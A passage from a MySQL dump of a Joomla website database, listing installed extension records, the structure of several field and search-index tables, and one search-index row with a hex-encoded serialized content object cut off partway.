(10547, 0, 'PLG_ENGAGEBOX_EMAILFORM', 'plugin', 'emailform', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_EMAILFORM\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_EMAILFORM_DESC\",\"group\":\"\",\"filename\":\"emailform\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10548, 0, 'PLG_ENGAGEBOX_IFRAME', 'plugin', 'iframe', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_IFRAME\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_IFRAME_DESC\",\"group\":\"\",\"filename\":\"iframe\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10549, 0, 'PLG_ENGAGEBOX_IMAGE', 'plugin', 'image', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_IMAGE\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_IMAGE_DESC\",\"group\":\"\",\"filename\":\"image\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0);
INSERT INTO `y57u5_extensions` (`extension_id`, `package_id`, `name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `system_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
(10550, 0, 'PLG_ENGAGEBOX_MODULE', 'plugin', 'module', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_MODULE\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_MODULE_DESC\",\"group\":\"\",\"filename\":\"module\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10551, 0, 'PLG_ENGAGEBOX_SMARTTAGS', 'plugin', 'smarttags', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_SMARTTAGS\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_SMARTTAGS_DESC\",\"group\":\"\",\"filename\":\"smarttags\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10552, 0, 'PLG_ENGAGEBOX_SOCIAL', 'plugin', 'social', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_SOCIAL\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_SOCIAL_DESC\",\"group\":\"\",\"filename\":\"social\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10553, 0, 'PLG_ENGAGEBOX_YESNO', 'plugin', 'yesno', 'engagebox', 0, 1, 1, 0, '{\"name\":\"PLG_ENGAGEBOX_YESNO\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c) 2018 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_ENGAGEBOX_YESNO_DESC\",\"group\":\"\",\"filename\":\"yesno\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10554, 0, 'PLG_SYSTEM_RSTBOX', 'plugin', 'rstbox', 'system', 0, 1, 1, 0, '{\"name\":\"PLG_SYSTEM_RSTBOX\",\"type\":\"plugin\",\"creationDate\":\"September 2015\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2016 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"3.0\",\"description\":\"PLG_SYSTEM_RSTBOX_DESC\",\"group\":\"\",\"filename\":\"rstbox\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(10555, 0, 'plg_system_tgeoip', 'plugin', 'tgeoip', 'system', 0, 1, 1, 0, '{\"name\":\"plg_system_tgeoip\",\"type\":\"plugin\",\"creationDate\":\"06 Mar 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"0.1\",\"description\":\"PLG_SYSTEM_TGEOIP_DESC\",\"group\":\"\",\"filename\":\"tgeoip\"}', '[]', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10557, 0, 'COM_CONVERTFORMS', 'component', 'com_convertforms', '', 1, 1, 0, 0, '{\"name\":\"COM_CONVERTFORMS\",\"type\":\"component\",\"creationDate\":\"September 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"2.1.1\",\"description\":\"COM_CONVERTFORMS_DESC\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10558, 0, 'mod_convertforms', 'module', 'mod_convertforms', '', 0, 1, 0, 0, '{\"name\":\"mod_convertforms\",\"type\":\"module\",\"creationDate\":\"October 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"MOD_CONVERTFORMS_DESC\",\"group\":\"\",\"filename\":\"mod_convertforms\"}', '{\"form\":\"10\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10559, 0, 'PLG_CONVERTFORMS_EMAILS', 'plugin', 'emails', 'convertforms', 0, 1, 1, 0, '{\"name\":\"PLG_CONVERTFORMS_EMAILS\",\"type\":\"plugin\",\"creationDate\":\"January 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright (c)2011-2016 Tassos Marinos\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_CONVERTFORMS_EMAILS_DESC\",\"group\":\"\",\"filename\":\"emails\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10560, 0, 'PLG_EDITORS-XTD_CONVERTFORMS', 'plugin', 'convertforms', 'editors-xtd', 0, 1, 1, 0, '{\"name\":\"PLG_EDITORS-XTD_CONVERTFORMS\",\"type\":\"plugin\",\"creationDate\":\"June 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_EDITORS-XTD_CONVERTFORMS_DESC\",\"group\":\"\",\"filename\":\"convertforms\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 1, 0),
(10561, 0, 'PLG_SYSTEM_CONVERTFORMS', 'plugin', 'convertforms', 'system', 0, 1, 1, 0, '{\"name\":\"PLG_SYSTEM_CONVERTFORMS\",\"type\":\"plugin\",\"creationDate\":\"September 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2018 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_SYSTEM_CONVERTFORMS_DESC\",\"group\":\"\",\"filename\":\"convertforms\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10562, 0, 'Vina YouTube Channel', 'module', 'mod_vina_youtube_channel', '', 0, 1, 0, 0, '{\"name\":\"Vina YouTube Channel\",\"type\":\"module\",\"creationDate\":\"July 06, 2015\",\"author\":\"VinaGecko.com\",\"copyright\":\"Copyright (C) 2015 VinaGecko.com. All rights reserved.\",\"authorEmail\":\"admin@vinagecko.com\",\"authorUrl\":\"http:\\/\\/VinaGecko.com\",\"version\":\"1.0\",\"description\":\"\\n\\t\\t<div style=\\\"border: 1px solid red; border-radius: 7px; padding: 10px;\\\">\\n\\t\\t\\t<strong>Vina YouTube Channel<\\/strong> is a great module for Joomla 3.4.x that displays your actual complete youtube channel on your website just like its shown on youtube.<br>\\n\\t\\t\\t<strong>VinaGecko.com<\\/strong> - Premium <a href=\\\"http:\\/\\/vinagecko.com\\/joomla-modules\\\" target=\\\"_blank\\\">Joomla Modules<\\/a>, <a href=\\\"http:\\/\\/vinagecko.com\\/joomla-plugins\\\" target=\\\"_blank\\\">Joomla Plugins<\\/a>, <a href=\\\"http:\\/\\/vinagecko.com\\/joomla-templates\\\" target=\\\"_blank\\\">Joomla Templates<\\/a>.\\n\\t\\t<\\/div>\\n\\t\",\"group\":\"\",\"filename\":\"mod_vina_youtube_channel\"}', '{\"channelUrl\":\"https:\\/\\/www.youtube.com\\/user\\/joomla\",\"searchTab\":\"1\",\"searchTabName\":\"Search-Joomla 3.4\",\"searchChannel\":\"\",\"relatedTo\":\"\",\"searchQuery\":\"joomla 3.4\",\"searchOrder\":\"date\",\"autoPlayVideo\":\"0\",\"autoLoadComments\":\"0\",\"commentOrder\":\"relevance\",\"displayVideo\":\"popup\",\"alwaysUseDropdown\":\"0\",\"skin\":\"grey\",\"maxResults\":\"15\",\"innerOffset\":\"40\",\"outerOffset\":\"35\",\"minItemWidth\":\"250\",\"maxItemWidth\":\"400\",\"maxContainerWidth\":\"1000\",\"cache\":\"1\",\"cache_time\":\"900\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10565, 10538, 'plg_fields_mediajce', 'plugin', 'mediajce', 'fields', 0, 1, 1, 0, '{\"name\":\"plg_fields_mediajce\",\"type\":\"plugin\",\"creationDate\":\"19-12-2018\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2018 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"https:\\/\\/www.joomlacontenteditor.net\",\"version\":\"2.6.35\",\"description\":\"PLG_FIELDS_MEDIAJCE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mediajce\"}', '[]', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10566, 0, 'googl Shortener', 'library', 'googl', '', 0, 1, 1, 0, '{\"name\":\"googl Shortener\",\"type\":\"library\",\"creationDate\":\"September 2018\",\"author\":\"Sebastian Wyder package by Carlos Camara\",\"copyright\":\"(C) 2010-2018 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"carcam@jevents.net\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"Googl Shortener library created by Sebastian Wyder (https:\\/\\/github.com\\/sebi\\/googl-php) and package by Carlos C\\u00e1mara (http:\\/\\/www.jevents.net)\",\"group\":\"\",\"filename\":\"googl\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10567, 0, 'JEvents - Bootstrap Modal Library', 'library', 'jevents/jevmodal', '', 0, 1, 1, 0, '{\"name\":\"JEvents - Bootstrap Modal Library\",\"type\":\"library\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2015-2018 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"via website\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"Bootstrap Modal Library for JEvents\",\"group\":\"\",\"filename\":\"jevmodal\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10568, 0, 'JEvents - Typeahead Library', 'library', 'jevents/jevtypeahead', '', 0, 1, 1, 0, '{\"name\":\"JEvents - Typeahead Library\",\"type\":\"library\",\"creationDate\":\"September 2018\",\"author\":\"GWE Systems Ltd\",\"copyright\":\"(C) 2015 GWE Systems Ltd. All rights reserved.\",\"authorEmail\":\"carcam@jevents.net\",\"authorUrl\":\"www.gwesystems.com\",\"version\":\"3.4.48\",\"description\":\"Typeahead Library for JEvents\",\"group\":\"\",\"filename\":\"jevtypeahead\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_fields`
--

CREATE TABLE `y57u5_fields` (
  `id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `group_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `label` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `default_value` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'text',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `required` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `fieldparams` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_fields_categories`
--

CREATE TABLE `y57u5_fields_categories` (
  `field_id` int(11) NOT NULL DEFAULT '0',
  `category_id` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_fields_groups`
--

CREATE TABLE `y57u5_fields_groups` (
  `id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_fields_values`
--

CREATE TABLE `y57u5_fields_values` (
  `field_id` int(10) UNSIGNED NOT NULL,
  `item_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'Allow references to items which have strings as ids, eg. none db systems.',
  `value` text COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_filters`
--

CREATE TABLE `y57u5_finder_filters` (
  `filter_id` int(10) UNSIGNED NOT NULL,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) UNSIGNED NOT NULL,
  `created_by_alias` varchar(255) NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `map_count` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `data` text NOT NULL,
  `params` mediumtext
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links`
--

CREATE TABLE `y57u5_finder_links` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `url` varchar(255) NOT NULL,
  `route` varchar(255) NOT NULL,
  `title` varchar(400) DEFAULT NULL,
  `description` text,
  `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `md5sum` varchar(32) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `state` int(5) DEFAULT '1',
  `access` int(5) DEFAULT '0',
  `language` varchar(8) NOT NULL,
  `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `list_price` double UNSIGNED NOT NULL DEFAULT '0',
  `sale_price` double UNSIGNED NOT NULL DEFAULT '0',
  `type_id` int(11) NOT NULL,
  `object` mediumblob NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links`
--

INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(31, 'index.php?option=com_k2&view=item&id=4', 'index.php?option=com_k2&view=item&id=4:inspiration-comes-from-within&Itemid=768', 'Inspiration comes from within', ' Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends. Don\'t go around saying the world owes you a livi', '2016-12-31 19:39:20', '4f7183ce8935a75c5eee1673d007c1c7', 1, 0, 1, '*', '2013-01-03 00:00:00', '0000-00-00 00:00:00', '2013-01-05 00:00:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2234223b733a353a22616c696173223b733a32393a22696e737069726174696f6e2d636f6d65732d66726f6d2d77697468696e223b733a373a2273756d6d617279223b733a3536393a223c7020636c6173733d2264726f70636170223e506572686170732074726176656c2063616e6e6f742070726576656e74206269676f7472792c206275742062792064656d6f6e7374726174696e67207468617420616c6c2070656f706c6573206372792c206c617567682c206561742c20776f7272792c20616e64206469652c2069742063616e20696e74726f6475636520746865206964656120746861742069662077652074727920616e6420756e6465727374616e642065616368206f746865722c207765206d6179206576656e206265636f6d6520667269656e64732e3c2f703e0d0a3c703e446f6e277420676f2061726f756e6420736179696e672074686520776f726c64206f77657320796f752061206c6976696e672e2054686520776f726c64206f77657320796f75206e6f7468696e672e2049742077617320686572652066697273742e20496620796f7520646f6e2774206c696b6520736f6d657468696e672c206368616e67652069742e20496620796f752063616e2774206368616e67652069742c206368616e676520796f75722061747469747564652e204368616e67652077696c6c206e6f7420636f6d65206966207765207761697420666f7220736f6d65206f7468657220706572736f6e206f7220736f6d65206f746865722074696d652e2057652061726520746865206f6e6573207765277665206265656e2077616974696e6720666f722e2057652061726520746865206368616e67652074686174207765207365656b2e3c2f703e0d0a223b733a343a22626f6479223b733a3736393a220d0a3c703e4974206973206e6f7420746865207374726f6e67657374206f6620746865207370656369657320746861742073757276697665732c206e6f7220746865206d6f737420696e74656c6c6967656e7420746861742073757276697665732e20497420697320746865206f6e65207468617420697320746865206d6f737420616461707461626c6520746f206368616e67652e20416c6c206368616e6765732c206576656e20746865206d6f7374206c6f6e67656420666f722c2068617665207468656972206d656c616e63686f6c793b20666f722077686174207765206c6561766520626568696e6420757320697320612070617274206f66206f757273656c7665733b207765206d7573742064696520746f206f6e65206c696665206265666f72652077652063616e20656e74657220616e6f746865722e3c2f703e0d0a3c703e5b626c6f636b71756f746520617574686f723d22756e6b6e6f776e225d2042656c6965766520696e20796f757273656c6621204861766520666169746820696e20796f7572206162696c69746965732120576974686f757420612068756d626c652062757420726561736f6e61626c6520636f6e666964656e636520696e20796f7572206f776e20706f7765727320796f752063616e6e6f74206265207375636365737366756c206f722068617070792e205b2f626c6f636b71756f74655d3c2f703e0d0a3c703e54616b65207570206f6e6520696465612e204d616b652074686174206f6e65206964656120796f7572206c696665202d207468696e6b206f662069742c20647265616d206f662069742c206c697665206f6e207468617420696465612e204c65742074686520627261696e2c206d7573636c65732c206e65727665732c2065766572792070617274206f6620796f757220626f64792c2062652066756c6c206f66207468617420696465612c20616e64206a757374206c65617665206576657279206f74686572206964656120616c6f6e652e2054686973206973207468652077617920746f20737563636573732e3c2f703e223b733a353a226361746964223b733a313a2233223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031362d31322d33312031383a35313a3331223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135363a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a31323a22312e31312e3072656d6f7465223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2231223b733a393a2275736572496d616765223b733a313a2231223b733a31353a22757365724465736372697074696f6e223b733a313a2231223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a343a2264617465223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2231223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a383a2273706c6173687570223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2231223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a313a2230223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2231223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a3